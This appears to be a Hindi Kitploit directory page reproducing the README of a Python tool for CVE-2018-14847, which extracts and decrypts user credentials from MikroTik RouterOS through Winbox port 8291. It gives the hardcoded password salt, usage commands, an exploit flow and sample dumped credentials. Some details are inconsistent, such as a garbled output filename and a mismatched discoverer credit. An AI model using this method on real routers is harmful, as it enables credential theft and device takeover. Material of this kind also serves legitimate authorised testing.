Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS — VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON | Kitploit
उपकरण/GitHubGitHub/mourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas
IoT SecurityPassword AttacksVulnerability AnalysisExploitationNetwork SecurityRed Teaming
GitHubmourafuseti/vulneravel-cve-2018-14847---credenciais-extraidas

VULNERAVEL-CVE-2018-14847---CREDENCIAIS-EXTRAIDAS

VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

पेंटेस्ट उपकरण — /नेटवर्क

ऑडिटिंग और नेटवर्क पैठ परीक्षण के लिए स्क्रिप्ट्स का भंडार। केवल औपचारिक प्राधिकरण वाले उपकरणों पर उपयोग करें।


CVE-2018-14847 — MikroTik Winbox क्रेडेंशियल एक्सट्रैक्टर

विवरण

MikroTik RouterOS की Winbox सेवा में अप्रमाणित फ़ाइल पढ़ने की कमज़ोरी का शोषण करता है। फ़ाइल हैंडलर (हैंडलर ID 2) प्रमाणीकरण को मान्य नहीं करता, जिससे बाहरी हमलावर user.dat फ़ाइल पढ़ सकता है जिसमें डिवाइस के सभी उपयोगकर्ता और पासवर्ड होते हैं।

पासवर्ड MD5(उपयोगकर्ता + "283i4jfkai3389") कुंजी का उपयोग करके XOR एन्क्रिप्टेड संग्रहीत होते हैं। स्क्रिप्ट स्वचालित रूप से डिक्रिप्शन करती है।

प्रभावित संस्करण

ब्रांचभेद्य अंतिम संस्करणसुधारित संस्करण
Stable6.426.42.1
Long-term6.40.76.40.8
RC6.426.43

आवश्यकताएँ

  • Python 3.x (बिना बाहरी निर्भरता के)
  • लक्ष्य पर पोर्ट 8291 (Winbox) सुलभ हो

उपयोग

root@kitploit:~
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291

उदाहरण

root@kitploit:~
# डिफ़ॉल्ट लक्ष्य पोर्ट 8291 पर
python3 cve_2018_14847.py 192.168.1.1

# कस्टम पोर्ट
python3 cve_2018_14847.py 192.168.1.1 --port 8291

एक्सप्लॉइट प्रवाह

root@kitploit:~
1. पोर्ट 8291 (Winbox) से कनेक्ट करें
        ↓
2. FIRST_PAYLOAD भेजें — सत्र खोलें + /flash/rw/store/user.dat का अनुरोध करें
        ↓
3. प्रतिक्रिया के बाइट 38 से सत्र ID निकालें
        ↓
4. SECOND_PAYLOAD के बाइट 19 में सत्र ID इंजेक्ट करें
        ↓
5. SECOND_PAYLOAD भेजें — user.dat फ़ाइल पढ़ें
        ↓
6. M2 प्रविष्टियाँ पार्स करें → उपयोगकर्ता और एन्क्रिप्टेड पासवर्ड निकालें
        ↓
7. पासवर्ड डिक्रिप्ट करें: XOR with MD5(उपयोगकर्ता + salt)
        ↓
8. क्रेडेंशियल प्रदर्शित करें और फ़ाइल में सहेजें

अपेक्षित आउटपुट

root@kitploit:~
═══════════════════════════════════════════════════════
  CVE-2018-14847  —  MikroTik Winbox Credential Dump
  अप्रमाणित फ़ाइल पढ़ना + पासवर्ड डिक्रिप्शन
  प्रभावित: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
  लक्ष्य  : 192.168.1.1:8291
  दिनांक  : 2026-05-20 18:06:58

[*] 192.168.1.1:8291 से कनेक्ट हो रहा है...
[+] Winbox सेवा से कनेक्ट हुआ।
[*] पेलोड 1 भेज रहा है (फ़ाइल अनुरोध)...
[+] प्रतिक्रिया प्राप्त हुई (84 बाइट्स)। सत्र ID: 0x35
[*] पेलोड 2 भेज रहा है (user.dat पढ़ना)...
[+] डेटा प्राप्त हुआ (312 बाइट्स)।
[*] user.dat विश्लेषण कर रहा है (257 उपयोगी बाइट्स) ...

═══════════════════════════════════════════════════════
  निकाले गए क्रेडेंशियल
═══════════════════════════════════════════════════════
  उपयोगकर्ता : admin
  पासवर्ड   : senha123
  कॉम्बो   : admin:senha123
───────────────────────────────────────────────────────
[+] 1 क्रेडेंशियल मिली।
[+] परिणाम सहेजा गया: mikrotik_1192.168.1.1_20260520_180658.txt

आउटपुट फ़ाइल

परिणाम स्वचालित रूप से सहेजा जाता है:

root@kitploit:~
mikrotik_<IP>_<TIMESTAMP>.txt

उदाहरण: mikrotik_192.168.1.1_20260520_180658.txt

इसमें शामिल: लक्ष्य का IP, दिनांक, CVE, प्रभावित संस्करण और सभी उपयोगकर्ता:पासवर्ड जोड़े।

संदर्भ

  • CVE: CVE-2018-14847
  • Exploit-DB: EDB-ID #45170
  • मूल खोज: Omid Shojaei (@Dmitriy_area51)
  • प्रकाशन: अप्रैल 2018

फ़ोल्डर संरचना

root@kitploit:~
/rede/
├── README.md                        # यह फ़ाइल
├── cve_2018_14847.py                # MikroTik Winbox क्रेडेंशियल एक्सट्रैक्टर
├── pentest_cgnat_100.64.0.0.md      # CGNAT पेंटेस्ट रिपोर्ट
├── pentest_roteador_192.168.2.1.md  # राउटर पेंटेस्ट रिपोर्ट
└── mikrotik_<IP>_<TIMESTAMP>.txt    # स्क्रिप्ट द्वारा उत्पन्न परिणाम

कानूनी चेतावनी: ये उपकरण केवल अधिकृत वातावरण में उपयोग के लिए हैं। तीसरे पक्ष के सिस्टम के विरुद्ध अनधिकृत निष्पादन अपराध है, जो लेई 12.737/2012 (कैरोलीना डाइकमान कानून) और ब्राज़ीलियाई आपराधिक संहिता के कला. 154-A के अंतर्गत दंडनीय है।

टूल डाउनलोड करें